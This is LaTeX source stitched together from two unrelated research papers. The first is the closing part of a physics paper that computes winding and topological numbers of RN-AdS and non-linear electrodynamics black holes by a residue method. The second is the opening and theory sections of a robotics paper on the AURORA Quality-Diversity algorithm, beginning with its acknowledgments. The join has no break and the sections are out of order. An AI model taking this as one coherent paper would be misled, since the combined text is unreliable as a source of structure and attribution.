\mathcal{R}_{RN-AdS}(z)=\frac{Q^2+\Lambda z^4-z^2}{\tau \left(Q^2+\Lambda z^4-z^2\right)+4 \pi z^3}.
\end{equation}
Based on the fundamental theorem of algebra as aforementioned, Eq. (\ref{rrnx}) can be rewritten as
\begin{equation}
\mathcal{R}_{RN-AdS}(z)=\frac{Q^2+\Lambda z^4-z^2}{\tau\Lambda (z-z_1)(z-z_2)(z-z_3)(z-z_4)}\equiv\frac{Q^2+\Lambda z^4-z^2}{\mathcal{A}(z)},
\end{equation}
where we have defined a polynomial function $\mathcal{A}(z)$ for brevity.
\begin{figure}[htpb!]
\begin{center}
\includegraphics[width=5.3in,angle=0]{root_rnads.pdf}
\end{center}
\vspace{-5mm}
\caption{Roots of the polynomial equation $\mathcal{A}(z)=0$ with $Q=1,\,\Lambda=-8\pi\times 0.0022$.}
\label{root_rnads}
\end{figure}
First, we focus on the case where there are four distinct real roots. One of the roots, say $z_4$, is negative, and the other three real roots satisfy $z_1<z_2<z_3$, as shown in Fig. \ref{root_rnads}. Since the fourth term in Eq. (\ref{metads}) is positive, we can deduce that $r_h>M>Q$, as otherwise there would be no horizon; hence $z_1>Q$. In this case, we have the local winding numbers
\begin{equation}
w_1=1,\,w_2=-1,\,w_3=1
\end{equation}
by using Eq. (\ref{wind}). Then we obtain
\begin{equation}
W=w_1+w_2+w_3=1
\end{equation}
for the global topological number of the RN-AdS black hole.
Notice that in the above analysis we did not need to specify a range for $\tau$; the residues can be calculated under the sole condition $\tau>0$. In fact, however, four real roots exist only for $\tau$ in a range $(\tau_{\textrm{b}},\,\tau_{\textrm{t}})$.
For $\tau<\tau_{\textrm{b}}$, as shown in Fig. \ref{root_rnads}, there is only one real positive root, $z_3$, whose local winding number is
\begin{equation}
w_3=1,
\end{equation}
whilst the global topological number of the black hole is
\begin{equation}
W=1.
\end{equation}
For $\tau>\tau_{\textrm{t}}$, as shown in Fig. \ref{root_rnads}, there is again only one real positive root, $z_1$, whose local winding number is
\begin{equation}
w_1=1,
\end{equation}
and the global topological number is still
\begin{equation}
W=1.
\end{equation}
Hence the topological number of the RN-AdS black hole is always $W=1$.
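To make the four-root case concrete, the sketch below uses $Q=1$ and $\Lambda=-8\pi\times 0.0022$ from Fig. \ref{root_rnads} with an illustrative $\tau=27$, which lies inside the window $(\tau_{\textrm{b}},\,\tau_{\textrm{t}})$; the root brackets were read off a sign scan of the denominator and are assumptions of this sketch. It recovers $w_1=1$, $w_2=-1$, $w_3=1$ and hence $W=1$:

```python
import math

Q, Lam, tau = 1.0, -8 * math.pi * 0.0022, 27.0   # tau chosen inside (tau_b, tau_t)

B = lambda z: Q**2 + Lam * z**4 - z**2                       # numerator of R
A = lambda z: tau * B(z) + 4 * math.pi * z**3                # denominator of R
dA = lambda z: tau * (4 * Lam * z**3 - 2 * z) + 12 * math.pi * z**2

def bisect(f, a, b, n=200):
    """Simple bisection; assumes f(a) and f(b) have opposite signs."""
    for _ in range(n):
        m = 0.5 * (a + b)
        a, b = (m, b) if f(a) * f(m) > 0 else (a, m)
    return 0.5 * (a + b)

# the three positive horizon branches (brackets found by a sign scan of A)
roots = [bisect(A, *br) for br in [(1.5, 1.6), (2.5, 3.0), (4.5, 5.0)]]
# the residue of R at a simple pole z_i of A is B(z_i)/A'(z_i);
# the winding number is its sign
winding = [int(math.copysign(1, B(z) / dA(z))) for z in roots]
print(winding, sum(winding))   # [1, -1, 1] 1
```

The alternating signs reproduce the stable/unstable/stable branch structure, and the signs sum to the global topological number $W=1$.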
For $\tau=\tau_{\textrm{b}}$ and $\tau=\tau_{\textrm{t}}$, we have $z_1=z_2$ and $z_2=z_3$, respectively. We denote the two merging points by $z_{1,2}$ and $z_{2,3}$; they are the generation point and the annihilation point, respectively. For the former case, we have
\begin{equation}
\mathcal{R}_{RN-AdS}(z)=\frac{Q^2+\Lambda z^4-z^2}{\tau\Lambda (z-z_{1,2})^2 (z-z_3)(z-z_4)},
\end{equation}
where $z_{1,2}$ is a root of multiplicity 2.
Then, by Eq. (\ref{wind}), calculating the residue at this pole of order 2 yields the winding number at this point,
\begin{equation}
w_{1,2}=-1.
\end{equation}
For the latter case, we have
\begin{equation}
\mathcal{R}_{RN-AdS}(z)=\frac{Q^2+\Lambda z^4-z^2}{\tau\Lambda (z-z_{1}) (z-z_{2,3})^2(z-z_4)},
\end{equation}
for which we calculate the residue at the second-order pole $z_{2,3}$, yielding
\begin{equation}
w_{2,3}=1.
\end{equation}
Combining this with the result for the RN black hole in Eq. (\ref{rnr2}), we see that the residue method gives different local topological properties for the generation and annihilation points, with negative and positive winding numbers, respectively. The topological current method used in \cite{Wei:2022dzw} gives winding number 0 for both kinds of points, owing to the conservation of the topological current.
There is one further possibility, $z_1=z_2=z_3$, which corresponds to the critical case; we refer to this root of multiplicity 3 as a critical point. For consistency with the analysis of black holes in non-linear electrodynamics below, we discuss it in the closing remarks [cf. Eq. (\ref{z123})].
\subsection{Black holes in non-linear electrodynamics}
Now we consider the black hole solutions in non-linear electrodynamics with an action
\begin{equation}
S=\int d^4 x \sqrt{-g}\left(R-2 \Lambda-\sum_{i=1}^{\infty} \alpha_i\left(F^2\right)^i\right),
\end{equation}
where $\alpha_i$ are dimensional coupling constants and $F^2\equiv F_{\mu\nu}F^{\mu\nu}$ with $F_{\mu\nu}$ the electromagnetic tensor. The black hole solution is \cite{Gao:2021kvr,Tavakoli:2022kmo}
\begin{equation}
\begin{aligned}
d s^2 &=-U(r) d t^2+\frac{1}{U(r)} d r^2+r^2 d \Omega_2^2, \\
A_\mu &=[\Phi(r), 0,0,0],
\end{aligned}
\end{equation}
where
\begin{equation}
\Phi=\sum_{i=1}^{\infty} b_i r^{-i}, \quad U=1+\sum_{i=1}^{\infty} c_i r^{-i}+\frac{r^2}{l^2}.
\end{equation}
For $\alpha_i \neq 0$ with $i \leq 7$, we can write them explicitly as
\begin{equation}
\Phi=\frac{Q}{r}+\frac{b_5}{r^5}+\frac{b_9}{r^9}+\frac{b_{13}}{r^{13}}+\frac{b_{17}}{r^{17}}+\frac{b_{21}}{r^{21}}+\frac{b_{25}}{r^{25}},
\end{equation}
\begin{equation}
\begin{aligned}
U=&\,1-\frac{2 M}{r}+\frac{Q^2}{r^2}+\frac{b_5 Q}{2 r^6}+\frac{b_9 Q}{3 r^{10}}+\frac{b_{13} Q}{4 r^{14}} \\
&+\frac{b_{17} Q}{5 r^{18}}+\frac{b_{21} Q}{6 r^{22}}+\frac{b_{25} Q}{7 r^{26}}+\frac{r^2}{l^2}
\end{aligned}
\end{equation}
with $b_i=0$ for $i>25$. With $\alpha_1=1$, we have
\begin{equation}
c_1=-2 M, \quad c_i=\frac{4 Q}{i+2} b_{i-1}, \quad \text { for } \quad i>1,
\end{equation}
where
\begin{equation}
b_1=Q, \quad b_5=\frac{4}{5} Q^3 \alpha_2, \quad b_9=\frac{4}{3} Q^5\left(4 \alpha_2^2-\alpha_3\right),
\end{equation}
\begin{equation}
b_{13}=\frac{32}{13} Q^7\left(24 \alpha_2^3-12 \alpha_3 \alpha_2+\alpha_4\right),
\end{equation}
\begin{equation}
b_{17}=\frac{80}{17} Q^9\left(176 \alpha_2^4-132 \alpha_2^2 \alpha_3+16 \alpha_4 \alpha_2+9 \alpha_3^2-\alpha_5\right),
\end{equation}
\begin{equation}
\begin{aligned}
b_{21}=& \frac{64}{7} Q^{11}\left(1456 \alpha_2^5+234 \alpha_3^2 \alpha_2+208 \alpha_4 \alpha_2^2-24 \alpha_4 \alpha_3\right.\\
&\left.-1456 \alpha_2^3 \alpha_3-20 \alpha_5 \alpha_2-\alpha_6\right),
\end{aligned}
\end{equation}
\begin{equation}
\begin{aligned}
b_{25}=&\frac{448}{25} Q^{13}\left(13056 \alpha_2^6+2560 \alpha_2^3 \alpha_4-720 \alpha_3 \alpha_2 \alpha_4\right. \\
&+16 \alpha_4^2-300 \alpha_2^2 \alpha_5+4320 \alpha_3^2 \alpha_2^2-16320 \alpha_2^4 \alpha_3 \\
&\left.-24 \alpha_6 \alpha_2-135 \alpha_3^3+30 \alpha_3 \alpha_5-\alpha_7\right).
\end{aligned}
\end{equation}
\begin{figure}[htpb!]
\begin{center}
\includegraphics[width=5.5in,angle=0]{ne.pdf}
\end{center}
\vspace{-5mm}
\caption {Positive real roots of the polynomial equation $\mathcal{A}(z)=0$ with $P=0.0006737,\,Q=2.4544565,\,\alpha_2=-5.3439180,\,\alpha_3=72.4523175,\,\alpha_4=-1248.4241037,\,\alpha_5=23241.5416893,\,\alpha_6=431538.2300431,\,\alpha_7=7.4168150\times 10^6,\,\tau=52.2102945$. We denote the roots as $z_1=3.0901936,\,z_2=3.1412747,\,z_3=3.2262569,\,z_4=3.3377906,\,z_5=3.47789817,\,z_6=3.6125760,\,z_7=3.7636139,\,z_8=3.8678889,\,z_9=3.9493271$, which correspond to the blue points from left to right in the diagram. Besides, there is one other real root, not shown, located at $z_{10}=-2.3623414$.}
\label{root_ne}
\end{figure}
The entropy and mass of the black hole are \cite{Tavakoli:2022kmo}
\begin{equation}
S=\pi r_{h}^2,
\end{equation}
\begin{equation}
M=\frac{b_5 Q}{4 r_h^5}+\frac{b_9 Q}{6 r_h^9}+\frac{b_{13} Q}{8 r_h^{13}}+\frac{b_{17} Q}{10 r_h^{17}}+\frac{b_{21} Q}{12 r_h^{21}}+\frac{b_{25} Q}{14 r_h^{25}}+\frac{4}{3} \pi P r_h^3+\frac{Q^2}{2 r_h}+\frac{r_h}{2}.
\end{equation}
Then we have the generalized off-shell free energy of the system as
\begin{equation}
\mathcal{F}=M-\frac{S}{\tau},
\end{equation}
which yields a characterized rational function \footnote{One subtle point here is that under the transformation $$\mathcal{A}(z)\to -\mathcal{A}(z),$$ both the winding number and the topological number change sign. We choose the sign of $\mathcal{A}(z)$ such that it reduces to the RN-AdS case in the vanishing $\alpha_i$ limit.}
\begin{equation}
\mathcal{R}_{NE}(z)\equiv\frac{\mathcal{B}(z)}{\mathcal{A}(z)},
\end{equation}
where
\begin{equation}
\begin{aligned}
\mathcal{A}(z)=&-350 b_5 Q \tau z^{20}-420 b_9 Q \tau z^{16}+1120 \pi P \tau z^{28}-140 Q^2 \tau z^{24}-560 \pi z^{27}+140 \tau z^{26}\\&-500 b_{25} Q \tau -455 b_{13} Q \tau z^{12}-476 b_{17} Q \tau z^8-490 b_{21} Q \tau z^4,
\end{aligned}
\end{equation}
\begin{equation}
\begin{aligned}
\mathcal{B}(z)=&-350 b_5 Q z^{20}-420 b_9 Q z^{16}-455 b_{13} Q z^{12}-476 b_{17} Q z^8-490 b_{21} Q z^4-500 b_{25} Q\\&+1120 \pi P z^{28}-140 Q^2 z^{24}+140 z^{26}.
\end{aligned}
\end{equation}
As explained in the caption of Fig. \ref{root_ne}, we can calculate the local winding number of each positive real root using Eq. (\ref{wind}),
\begin{equation}
w_{2k-1}=1,\,w_{2k}=-1,\,w_9=1,\quad k=1, 2, 3, 4.
\end{equation}
As a result, we have the global topological number
\begin{equation}
W=\sum_{i=1}^{9}w_i=1.
\end{equation}
This is the same as for the RN-AdS black hole. However, the number of generation/annihilation points differs. Denoting by $w_{i,j}$ the winding number of the point where roots $z_i$ and $z_j$ merge, we have merging points $z_{i,i+1}$ $(i=1,2,\ldots,8)$, with winding numbers
\begin{equation}
w_{2k-1,2k}=-1, w_{2k,2k+1}=1, k=1,2,3,4.
\end{equation}
The points with winding number $-1$ and $+1$ can be identified as generation points and annihilation points, respectively.
\section{Closing remarks}\label{sec:con}
In this paper, we proposed a new formulation to study the thermodynamic topological properties of black holes. In the generalized free energy landscape, we defined a characterized complex function (\ref{cf}) based on the off-shell free energy of the black hole. Instead of applying Duan's topological current theory \cite{Wei:2022dzw}, we perform contour integrals around the singular points of this complex function, which, by the residue theorem, amounts to calculating the residues at those singular points. Local topological properties are closely related to the winding numbers of isolated poles of order 1, which can be computed by applying (\ref{wind}). With our definition, positive and negative winding numbers correspond to locally stable black holes with positive specific heat and locally unstable black holes with negative specific heat, respectively. The global topological number of a black hole, which can be used to discern spacetime categories, is obtained by summing the winding numbers of all singular points. We have exemplified our residue method by computing winding numbers and topological numbers for the Schwarzschild, RN, and RN-AdS black holes; the results are consistent with those in \cite{Wei:2022dzw}. Moreover, we have studied the thermodynamic topological properties of black holes in non-linear electrodynamics and found that the winding numbers of locally stable (unstable) black hole branches are always positive (negative). We also found that the non-linear electromagnetic field does not change the global topological properties of the AdS black hole: its topological number remains the same as that of the RN-AdS black hole.
Surprisingly, the topological characterisation of the generation and annihilation points can be quite different between Duan's topological current method and the residue method. The former yields a winding number of 0 for both generation and annihilation points, whilst the latter gives a winding number of $-1$ for the generation point and $1$ for the annihilation point. Duan's topological current is conserved, so a vanishing winding number at both the generation and annihilation points is inevitable. In the residue method, however, the generation and annihilation points are roots of multiplicity 2, so calculating the residue at such poles of order 2 involves the derivative of the characteristic function constructed from the off-shell free energy. Since the sign of this derivative at a generation point is opposite to that at an annihilation point, it is not difficult to understand why the two kinds of points acquire different winding numbers. It is this distinct representation of the topological properties of the generation and annihilation points that makes the residue method an effective complement to Duan's topological current method.
One may notice that for the RN-AdS black hole, the three points $z_1,\,z_2,\,z_3$ may merge. Indeed, for $\tau=3 \sqrt{6} \pi Q$ and $\Lambda=-1/(12 Q^2)$, we do have such a merging point at $z_{1,2,3}=\sqrt{6}Q$, and a direct calculation shows that
\begin{equation}\label{z123}
\textrm{Res}\mathcal{R}_{RN-AdS} (z_{1,2,3})=0.
\end{equation}
In this case, according to the definition of the winding number (\ref{wind}), we have
\begin{equation}
w_{1,2,3}=\textrm{Sgn}[\textrm{Res}\mathcal{R}(z_{1,2,3})]=0.
\end{equation}
This result is striking: the winding number of the critical point is zero, different from that of all other kinds of points, including the generation/annihilation points and the poles of order 1. Consequently, the critical thermodynamic defect can still be identified by its winding number. A further question then arises: for the non-linear electromagnetic black hole, which admits multi-critical points \cite{Tavakoli:2022kmo}, more than three of the points in Fig. \ref{root_ne} can merge, and one may ask what the local topological properties of such multi-merging points are. We believe this question deserves further investigation.
\section*{Acknowledgements}
We are grateful to Shao-Wen Wei for useful discussions. M. Z. is supported by the National Natural Science Foundation of China with Grant No. 12005080. J. J. is supported by the National Natural Science Foundation of China with Grant No. 12205014, the Guangdong Basic and Applied Research Foundation with Grant No. 217200003, and the Talents Introduction Foundation of Beijing Normal University with Grant No. 310432102.
\bibliographystyle{jhep}
\end{document}
\subsubsection*{Acknowledgments}
This work was supported by the Engineering and Physical Sciences Research Council (EPSRC) grant EP/V006673/1 project REcoVER.
We thank the members of the Adaptive and Intelligent Robotics Lab for their very valuable comments.
\section{Introduction}
One of the motivations of using learning algorithms in robotics is to enable robots to discover on their own their abilities.
Ideally, a robot should be able to discover on its own how to manipulate new objects~\citep{johns2016deep} or how to adapt its behaviours when facing an unseen situation like mechanical damage~\citep{Cully2014robotsanimals}.
However, despite many impressive breakthroughs in learning algorithms for robotics applications during the last decade~\citep{akkaya2019solving, hwangbo2019learning}, these methods still require a significant amount of engineering to become effective, for instance, to define reward functions, state definitions, or characterise the expected behaviours.
Finding all possible behaviours for a robot is an open-ended process, as the set of all achievable robot behaviours is unboundedly complex.
There are plenty of different ways to execute each type of behaviour.
For instance, for moving forward, rotating or jumping, the robot can move at different speeds, and use different locomotion gaits.
Supplementary behaviours can emerge from interactions with objects and with other agents.
An attempt to discover autonomously the behaviours of a robot has been proposed with the AURORA algorithm~\citep{Cully2019,grillotti2021unsupervised}.
This algorithm leverages the creativity of Quality-Diversity (QD) optimisation algorithms to generate a collection of diverse and high-performing behaviours, called a behavioural repertoire.
QD algorithms usually require the definition of a manually-defined Behavioural Descriptor (BD) to characterise the different types of behaviours contained in the repertoire.
Instead, AURORA uses dimensionality-reduction techniques to perform the behavioural characterisation in an unsupervised manner.
The resulting algorithms enable robots to autonomously discover a large diversity of behaviours without requiring a user to define a performance function or a behavioural descriptor.
Nevertheless, in prior work, AURORA has only been used to learn behavioural characterisations from \textit{hand-defined} sensory data.
For example, \citet{grillotti2021unsupervised} use as sensory data a robot picture taken at the end of an episode from an appropriate camera angle.
In that case, a considerable amount of prior information is provided to the algorithm: only the end of the episode is considered (instead of the full trajectory), and only the given camera angle is used (instead of other camera angles or the joint positions).
In this work, we propose an extended analysis of AURORA{}, where behavioural characterisations are learned based on the complete trajectory of the robot's raw states.
In that sense, no prior information is injected into the sensory data.
We evaluated AURORA{} on a simulated hexapod robot with a neural network controller on three tasks: navigation, moving forward with a high velocity, and performing half-rolls.
Furthermore, we compare AURORA{} to several baselines, all of which use hand-coded BDs.
In most cases, the collections obtained via AURORA{} present more diversity than those obtained from hand-coded QD algorithms.
In particular, AURORA{} automatically discovers behaviours that make the robot navigate to diverse positions, while using its legs in diverse ways, and perform half-rolls.
\section{Background}
\subsection{Quality-Diversity Algorithms}
\label{sec:background_qd}
Quality-Diversity (QD) algorithms are a subclass of evolutionary algorithms that aim at finding a container of both diverse and high-performing policies.
In addition to standard evolutionary algorithms, QD algorithms consider a Behavioural Descriptor (BD), which is a low-dimensional vector that characterises the behaviour of a policy.
QD algorithms use the BDs to quantify the novelty of a policy with respect to the solutions already in the container.
The container of policies is filled in an iterative manner, following these steps: (1) policies are selected from the container and undergo random variations (e.g. mutations, cross-overs); (2) their performance score and BD are evaluated; and (3) we try to add them back to the container.
If they are novel enough compared to solutions that are already in the container, they are added to the container.
If they are better than similar policies in the container, they replace these policies.
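The three steps above can be sketched in a few lines of Python. The toy task, the MAP-Elites-style grid container, and the mutation scale below are illustrative choices of ours (many QD variants instead use unstructured containers with a novelty criterion, as described above):

```python
import random

# Toy QD task: a policy is 2 parameters; its BD is the parameters clipped
# to [0, 1]^2; its fitness is the negative distance to the centre.
def evaluate(theta):
    bd = tuple(min(max(t, 0.0), 1.0) for t in theta)
    fitness = -((theta[0] - 0.5) ** 2 + (theta[1] - 0.5) ** 2)
    return bd, fitness

def to_cell(bd, bins=10):            # discretise the BD space into a grid
    return tuple(min(int(b * bins), bins - 1) for b in bd)

random.seed(0)
archive = {}                         # cell -> (theta, fitness)
for _ in range(5000):
    if archive:                      # (1) select a parent and mutate it
        parent, _ = random.choice(list(archive.values()))
        theta = [p + random.gauss(0, 0.1) for p in parent]
    else:
        theta = [random.random(), random.random()]
    bd, fit = evaluate(theta)        # (2) evaluate BD and performance
    cell = to_cell(bd)               # (3) keep if cell empty or improved
    if cell not in archive or fit > archive[cell][1]:
        archive[cell] = (theta, fit)
print(len(archive))                  # number of distinct behaviours found
```

Here a new policy replaces the occupant of its grid cell only if it has a higher fitness, which mirrors step (3) above.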
\subsection{Autonomous Robots Realising their Abilities (AURORA)}
\label{subsec:unsupervised_behaviours}
Quality diversity algorithms are a promising tool to generate a large diversity of behaviours in robotics. However, the definition of the BD space might not always be straightforward when the robot or its capabilities are unknown. AURORA is a QD algorithm designed to discover the abilities of robots, by maximising the diversity of behaviours contained in the repertoire in an unsupervised manner. AURORA automatically defines the BD by encoding the high-dimensional sensory data collected by the robot during an episode.
The encoding can be achieved using any dimensionality reduction technique, such as, Auto-Encoder (AE) \citep{grillotti2021unsupervised} or Principal Component Analysis \citep{Cully2019}.
To generate a behavioural repertoire, AURORA alternates between QD phases and Encoder phases.
During the QD phase, policies undergo the same process as in standard QD algorithms: selection from the container, evaluation, and an attempt to add them to the container. However, the evaluation is performed in a slightly different way: instead of a low-dimensional BD, the QD task returns high-dimensional sensory data, which is then encoded using the dimensionality reduction technique. The latent encoding of the sensory data is used as the BD for the rest of the QD phase.
During the Encoder phase, the dimensionality reduction structure (e.g. the AE) is trained using the high-dimensional data from all the policies present in the container.
Once the encoder is trained, the unsupervised BDs are recomputed with the new encoder for all policies present in the container.
Alternating these two phases enables AURORA to progressively build its behavioural repertoires by discovering new solutions, while refining its encoding of the high-dimensional sensory data generated by the robot every time new solutions are added to the archive.
In this work, the sensory data collected by the robot corresponds to the full-state trajectory of the robot.
\section{Related Works}
The problem of autonomously finding diverse behaviours has been addressed with Mutual-Information (MI) maximisation approaches \citep{gregor2016variational, eysenbach2018diversity, sharma2019dynamics}.
Such methods aim to maximise the mutual information between the states explored by the robot, and a latent variable representing the behaviour.
Those MI-based approaches then return a single policy, which is conditioned on the behaviour latent variable.
That differs from QD algorithms, which return a container of different policies.
Also, MI-maximisation algorithms do not necessarily require the definition of a BD. For example, in the work of \citet{eysenbach2018diversity}, diverse robotic behaviours are learned from full robot states.
Similarly to AURORA, when the robot states are described with high-dimensional images, an encoder can be used to compute tractable low-dimensional representations \citep{liu2021apt, liu2021aps}.
While sharing the same purpose, QD and MI-maximisation algorithms are fundamentally different in their core design.
Those differences make it challenging to compare the two approaches in a fair manner.
In QD algorithms, selecting the most appropriate definitions for the BD and the performance requires a certain level of expertise.
For instance, the MAP-Elites algorithm \citep{Mouret2015, Cully2014robotsanimals} is often used with the same hexapod robot, but with two different sets of definitions: 1) the leg duty-factor for the BD, defined as the time proportion each leg is in contact with the ground, with the average speed for the performance~\citep{Cully2014robotsanimals,Cully2018QDFramework} or 2) the final location of the robot after walking during three seconds for the BD, with an orientation error for the performance~\citep{Cully2013,duarte2016evorbc,chatzilygeroudis2018reset}.
The resulting behavioural repertoires will find different types of applications.
The first set of definitions is designed for fast damage recovery as it provides a diversity of ways to achieve high-speed gaits, while the second one is designed for navigation tasks as the repertoire enables the robot to move in various directions.
To avoid the expertise requirements in the behaviour descriptor definition, several methods have been proposed to enable the automatic definition of the behavioural descriptors.
As described previously, AURORA aims to tackle this problem by using a dimensionality reduction algorithm (a Deep Auto-Encoder~\citep{masci2011stacked}) to project the features of the solutions into a latent space and use this latent space as a behavioural descriptor space. TAXONS~\citep{Paolo2019taxons} is another QD algorithm adopting the same principle; it demonstrated that this approach can scale to camera images to produce large behavioural repertoires for different types of robots. The same concept was also used in the context of Novelty Search prior to AURORA and TAXONS to generate assets for video games with the DeLeNoX algorithm~\citep{Liapis2013}.
All these methods aim to maximise the diversity of the produced solutions, without specifically considering a downstream task.
A different direction to automatically define a behavioural descriptor is to use Meta-Learning. The idea is to find the BD definition that maximises the performance of the resulting collection of solutions when used in a downstream task. For instance, \citet{bossens2020learning} considers the damage recovery capabilities provided by a behavioural repertoire as a Meta-Learning objective and search for the linear combination of a pre-defined set of behaviour descriptors that will maximise this objective. A related approach proposed by \citet{meyerson2016learning} uses a set of training tasks to learn what would be the most appropriate BD definition to solve a "test task".
\section{Learning Diverse Behaviours from Full-State Trajectories}
In this section, we provide a theoretical analysis of the AURORA algorithm, to support its ability to generate a large collection of diverse behaviours in an unsupervised manner.
In essence, we aim to find a container of policies exhibiting diverse behaviours.
We consider that a \textit{behaviour} is defined as the full-state trajectory: $\vec s_{1:T}$.
Then the overall problem of finding diverse behaviours $\left(\vec s_{1:T}^{(i)}\right)_{i}$ can be expressed as an entropy maximisation problem.
Considering the behaviour $\vec s_{1:T}$ as a random variable, we aim to maximise the entropy of $\vec s_{1:T}$, written $\entropy{\vec s_{1:T}}$.
In the following sections we will explain (1) why it can be ineffective to maximise directly the diversity of full-state trajectories $\vec s_{1:T}$; and (2) how AURORA can be used to maximise indirectly this diversity.
\subsection{Problem with High-dimensional Behavioural Descriptors}
Maximising the entropy of full-state trajectories $\entropy{\vec s_{1:T}}$ is theoretically possible by using a QD algorithm with $\vec s_{1:T}$ as a Behavioural Descriptor (BD).
However, it is computationally inefficient to use QD algorithms with high-dimensional BDs.
Indeed, as the dimensionality of the problem is high, a substantial number of samples of $\vec s_{1:T}$ is required to optimise $\entropy{\vec s_{1:T}}$.
So a significant number of policies is needed in the container.
However, QD algorithms become less efficient when the number of policies increases.
When the number of policies in the container increases, the selection pressure decreases, meaning that each policy in the container becomes less likely to be selected \citep{Cully2018QDFramework}.
Moreover, unstructured containers in QD algorithms rely on the k-nearest-neighbours algorithm to compute the novelty of a policy.
The complexity of that algorithm is $O\left( \dim{\mathcal{B}}\log \abs{\mathcal{C}} \right)$ on average \citep{bentley1975multidimensional}, and $O\left( \dim{\mathcal{B}} \abs{\mathcal{C}} \right)$ in the worst case ($\mathcal{B}$ refers to the BD space, and $\abs{\mathcal{C}}$ is the number of policies in the container $\mathcal{C}$).
Hence, the computational complexity of one QD generation increases linearly with the dimensionality $\dim{\mathcal{B}}$ of the BD.
That is why the overall procedure of adding policies to the container at each QD generation may become too computationally expensive if the dimension of $\mathcal{B}$ increases significantly.
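For illustration, a brute-force version of the novelty computation discussed above, exhibiting the $O\left( \dim{\mathcal{B}} \abs{\mathcal{C}} \right)$ worst-case cost; the Euclidean metric and $k=3$ are illustrative choices:

```python
import math
import random

# Brute-force k-nearest-neighbour novelty score, as used by unstructured
# QD containers: the novelty of a BD is its mean distance to the k closest
# BDs already stored. Scanning the whole container gives the worst-case
# cost discussed above.
def novelty(bd, container, k=3):
    dists = sorted(math.dist(bd, other) for other in container)
    return sum(dists[:k]) / min(k, len(dists)) if dists else float("inf")

random.seed(1)
container = [(random.random(), random.random()) for _ in range(100)]
print(novelty((0.5, 0.5), container))   # small: the centre is crowded
print(novelty((5.0, 5.0), container))   # large: far from every stored BD
```

In practice, k-d trees bring the average cost down to the logarithmic bound cited above.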
\subsection{Learning Low-dimensional Descriptors from High-dimensional State Trajectories}
\label{sec:learning-low-from-high}
\newcommand{\mi}[2]{I\left( #1 , #2 \right)}
The encoder update phase of AURORA optimises the parameters $\vec\eta_{\mathcal{E}}$ of the encoder $\mathcal{E}$; this encoder is then used to define a low-dimensional BD $\vec b_{\encoder}$ from state trajectories: $\vec b_{\encoder} = \mathcal{E}(\states)$.
Figure~\ref{fig:graphical_model} summarises the dependencies between the different variables considered in standard QD algorithms and AURORA.
The mutual information $\mi{\cdot}{\cdot}$ between $\states$ and $\vec b_{\encoder}$ can be expressed in two symmetrical ways:
\begin{align}
\mi{\states}{\vec b_{\encoder}} &= \entropy{\states} - \entropyCond{\states}{\vec b_{\encoder}} \label{eq:mi_obs} \\
\mi{\states}{\vec b_{\encoder}} &= \entropy{\vec b_{\encoder}} - \entropyCond{\vec b_{\encoder}}{\states} \label{eq:mi_bdprop}
\end{align}
As $\vec b_{\encoder}$ is a function of $\states$, we have: $\entropyCond{\vec b_{\encoder}}{\states} = 0$.
Then, from equations~\ref{eq:mi_obs} and~\ref{eq:mi_bdprop} we get:
\begin{align}
\entropy{\states} &= \entropy{\vec b_{\encoder}} + \entropyCond{\states}{\vec b_{\encoder}} \\
&= \entropy{\vec b_{\encoder}} + \entropyCond{\states}{\mathcal{E} \left( \states \right)} \label{eq:entropy_obs_equality}
\end{align}
According to equation~\ref{eq:entropy_obs_equality}, $\entropy{\states}$ can be decomposed into two components:
\begin{itemize}
\item The entropy on the BD space $\entropy{\vec b_{\encoder}}$, which can be maximised via a QD algorithm.
\item The conditional entropy of the state trajectories with respect to their encoding $\entropyCond{\states}{\mathcal{E} \left( \states \right)}$.
This term quantifies the information that is lost between $\states$ and its encoding $\vec b_{\encoder} = \mathcal{E} \left( \states \right)$.
\end{itemize}
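The decomposition in equation~\ref{eq:entropy_obs_equality} holds for any deterministic encoder, and can be checked empirically on a toy discrete distribution; the sample set and the encoder below are arbitrary illustrative choices:

```python
import math
from collections import Counter

# Empirical check of H(s) = H(E(s)) + H(s | E(s)) for a deterministic
# encoder E, on a toy discrete distribution of "trajectories".
X = ["aa", "ab", "ba", "bb", "bb", "ab"]   # samples of the trajectory
E = lambda s: s[0]                          # a lossy deterministic encoding

def H(samples):
    n = len(samples)
    return -sum(c / n * math.log2(c / n) for c in Counter(samples).values())

H_x = H(X)                                  # entropy of the trajectories
H_b = H([E(s) for s in X])                  # entropy of the encodings
# conditional entropy H(X | B) = sum_b p(b) * H(X | B = b)
groups = Counter(E(s) for s in X)
H_x_given_b = sum(
    (nb / len(X)) * H([s for s in X if E(s) == b]) for b, nb in groups.items()
)
print(round(H_x, 6), round(H_b + H_x_given_b, 6))   # both print 1.918296
```

The two printed values coincide, as guaranteed by the identity whenever $\vec b_{\encoder}$ is a deterministic function of $\states$.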
Since the conditional entropy is non-negative, equation~\ref{eq:entropy_obs_equality} gives a lower bound on the entropy of state trajectories:
\begin{align}
\entropy{\states} \geq \entropy{\vec b_{\encoder}} \label{eq:lower-bound-obs}
\end{align}
Fano's inequality \citep[p.~38]{cover2012elements} then bounds the difference between these entropies:
\begin{align}
\entropy{\states} - \entropy{\vec b_{\encoder}} &= \entropyCond{\states}{\mathcal{E} \left( \states \right)} \\
\entropy{\states} - \entropy{\vec b_{\encoder}} &\leq \entropy{e} + P(e) \log \card{\mathcal{X}_{\mathcal{O}^T}} \label{eq:inequality_differences}
\end{align}
where $P(e) = P(\states \neq \widehat{\states})$, $\widehat{\states}$ represents a reconstruction of the state trajectories $\states$ from the encoding $\mathcal{E}(\states)=\vec b_{\encoder}$, and $\mathcal{X}_{\mathcal{O}^T}$ represents the discretised support of the state trajectories $\states$.
As explained in section~\ref{subsec:unsupervised_behaviours}, AURORA alternates between two phases: an \textit{encoder update} phase, and a \textit{QD} phase.
During the encoder update phase, we minimise the difference $\entropy{\states} - \entropy{\vec b_{\encoder}}=\entropy{\states} - \entropy{\mathcal{E}(\states)}$ by training the encoder $\mathcal{E}$.
Indeed, training $\mathcal{E}$ will reduce the probability of reconstruction error $P(e)$, with the intention of lessening the difference $\entropy{\states} - \entropy{\vec b_{\encoder}}$ (see inequality~\ref{eq:inequality_differences}).
During the QD phase, now that the difference between both sides of inequality~\ref{eq:lower-bound-obs} is minimised, we increase the lower bound of $\entropy{\states}$, namely $\entropy{\vec b_{\encoder}}$.
As $\vec b_{\encoder}$ is a low-dimensional BD, maximising $\entropy{\vec b_{\encoder}}$ can be intuitively achieved by applying a standard Quality-Diversity algorithm, with $\vec b_{\encoder}$ as BD.
